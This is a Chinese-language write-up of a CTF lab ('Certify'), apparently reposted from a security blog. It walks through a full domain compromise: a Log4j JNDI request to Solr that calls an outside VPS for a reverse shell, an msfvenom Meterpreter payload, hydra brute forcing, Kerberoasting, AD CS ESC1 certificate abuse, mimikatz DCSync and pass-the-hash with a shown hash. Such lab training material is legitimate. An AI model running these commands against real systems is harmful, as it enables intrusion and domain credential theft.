实战 | 记一次春秋云镜域渗透靶场Certify

渗透技巧 2年前 (2023) admin
564 0 0

靶标介绍:
Certify是一套难度为中等的靶场环境,完成该挑战可以帮助玩家了解内网渗透中的代理转发、内网扫描、信息收集、特权提升以及横向移动技术方法,加强对域环境核心认证机制的理解,以及掌握域环境渗透中一些有趣的技术要点。该靶场共有4个flag,分布于不同的靶机。
技术涉及点:
Solr RCE、AD CS、SMB、Kerberos、域渗透
外网打点:

实战 | 记一次春秋云镜域渗透靶场Certify

有ssh服务,一个默认的80端口Welcometonginx!页面和SolrAdmin

实战 | 记一次春秋云镜域渗透靶场Certify

实战 | 记一次春秋云镜域渗透靶场Certify

发现了solr使用了log4j的组件,我们可以进行log4j RCE

实战 | 记一次春秋云镜域渗透靶场Certify

JNDI反弹shell,在VPS上开启服务

# 加载恶意类
java -jar JNDIExploit-1.3-SNAPSHOT.jar -i yourVPS

#开启监听
nc -lnvp 80

实战 | 记一次春秋云镜域渗透靶场Certify

Burp Suite发送数据包

GET /solr/admin/cores?action=${jndi:ldap://119.91.26.244:1389/Basic/ReverseShell/119.91.26.244/80 HTTP/1.1
Host: 47.92.242.84:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/109.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

实战 | 记一次春秋云镜域渗透靶场Certify

获得反弹shell
提权:

实战 | 记一次春秋云镜域渗透靶场Certify

sudo -l提权发现grc

sudo grc --help

实战 | 记一次春秋云镜域渗透靶场Certify

查找flag

sudo grc --pty find / -name flag*

实战 | 记一次春秋云镜域渗透靶场Certify

获得flag01
在给Meterpreter一个会话

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=yourVPS LPORT=443 -f elf -o shellrawss

python3开启HTTP服务

实战 | 记一次春秋云镜域渗透靶场Certify

实战 | 记一次春秋云镜域渗透靶场Certify

MSF监听

实战 | 记一次春秋云镜域渗透靶场Certify

目标机运行linux马获得Meterpreter会话

实战 | 记一次春秋云镜域渗透靶场Certify

Socks5代理进内网和内网信息收集:

实战 | 记一次春秋云镜域渗透靶场Certify

上传Fscan

实战 | 记一次春秋云镜域渗透靶场Certify

内网网段172.22.9.0
fscan命令:

./fscan_386 -h 172.22.9.0/24 >> fscan.txt

实战 | 记一次春秋云镜域渗透靶场Certify

整理得到:

172.22.9.19:入口IP
172.22.9.7:域控制器DC
172.22.9.26:域成员
172.22.9.47:文件服务器
172.22.9.13:CA

根据提示,文件服务器猜测存在smb的共享,但是fscan不扫描smb的共享模式,只能使用nmap扫描

实战 | 记一次春秋云镜域渗透靶场Certify

实战 | 记一次春秋云镜域渗透靶场Certify

开启Socks5并为MSF添加路由

实战 | 记一次春秋云镜域渗透靶场Certify

proxychains nmap -sT -A -Pn 172.22.9.47 >> nmap01.txt

实战 | 记一次春秋云镜域渗透靶场Certify

proxychains smbclient \\172.22.9.47\fileshare
dir
get personnel.db
get secretflag02.txt

获得flag02

实战 | 记一次春秋云镜域渗透靶场Certify

还有提示 you have enumerated smb. But do you know what an SPN is?
数据库文件中有几个用户名和密码

实战 | 记一次春秋云镜域渗透靶场Certify

rdp破解

proxychains hydra -L user.txt -P pwd.txt 172.22.9.26 rdp -vV -e ns

实战 | 记一次春秋云镜域渗透靶场Certify

获得了两个账号,但是无法远程登录
Kerberoast攻击:
使用GetUserSPNs.py寻找注册在域用户下的SPN

proxychains python3 GetUserSPNs.py -request -dc-ip 172.22.9.7 xiaorang.lab/zhangjian

然后在使用hashcat进行破解,rockyou.txt 是kali自带的密码本

hashcat64.exe -m 13100 1.txt rockyou.txt

破解得到密码
zhangxia/MyPass2@@6,使用账号密码进行远程登录

rdesktop 172.22.9.26

实战 | 记一次春秋云镜域渗透靶场Certify

登录完成后并不能直接访问administrator的目录查找flag,因为没有管理员权限
ADCS ESC1:
Certify.exe定位漏洞

Certify.exe find /vulnerable

实战 | 记一次春秋云镜域渗透靶场Certify

ESC1利用前提条件:
msPKI-Certificates-Name-Flag: ENROLLEE_SUPPLIES_SUBJECT
表示基于此证书模板申请新证书的用户可以为其他用户申请证书,即任何用户,包括域管理员用户
PkiExtendedKeyUsage: Client Authentication
表示将基于此证书模板生成的证书可用于对 Active Directory 中的计算机进行身份验证
Enrollment Rights: NT AuthorityAuthenticated Users
表示允许 Active Directory 中任何经过身份验证的用户请求基于此证书模板生成的新证书

为域管申请证书:

Certify.exe request /ca:CA01.xiaorang.labxiaorang-CA01-CA /template:"XR Manager" /altname:XIAORANG.LABAdministrator

实战 | 记一次春秋云镜域渗透靶场Certify

转换格式:

openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

请求TGT,PTT
密码留空就行

Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /password: /ptt

实战 | 记一次春秋云镜域渗透靶场Certify

获取到域管的票据后上传mimikatz导出哈希
DcSync攻击:

mimikatz.exe "lsadump::dcsync /domain:xiaorang.lab /user:Administrator" exit

哈希传递:

proxychains crackmapexec smb 172.22.9.26 -u administrator -H2f1b57eefb2d152196836b0516abea80 -d xiaorang.lab -x "type UsersAdministratorflagflag03.txt"

实战 | 记一次春秋云镜域渗透靶场Certify

获得flag03
横向域控制器:

实战 | 记一次春秋云镜域渗透靶场Certify

proxychains python3 wmiexec.py -hashes 00000000000000000000000000000000:2f1b57eefb2d152196836b0516abea80 [email protected]

实战 | 记一次春秋云镜域渗透靶场Certify

获得最后的flag04

原文地址:https://xz.aliyun.com/t/12117 侵权联系删除

实战 | 记一次春秋云镜域渗透靶场Certify

QQ学习群

实战 | 记一次春秋云镜域渗透靶场Certify

微信群

实战 | 记一次春秋云镜域渗透靶场Certify

实战 | 记一次春秋云镜域渗透靶场Certify

想成为Kevin Mitnick一样的

黑客教父?不存在的

想成为渗透之神?醒醒吧

看了无数入门视频,依然搞不到Shell

不妨看看《安全帮Live》

实战 | 记一次春秋云镜域渗透靶场Certify




原文始发于微信公众号(安全帮Live):实战 | 记一次春秋云镜域渗透靶场Certify

版权声明:admin 发表于 2023年2月8日 上午8:11。
转载请注明:实战 | 记一次春秋云镜域渗透靶场Certify | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...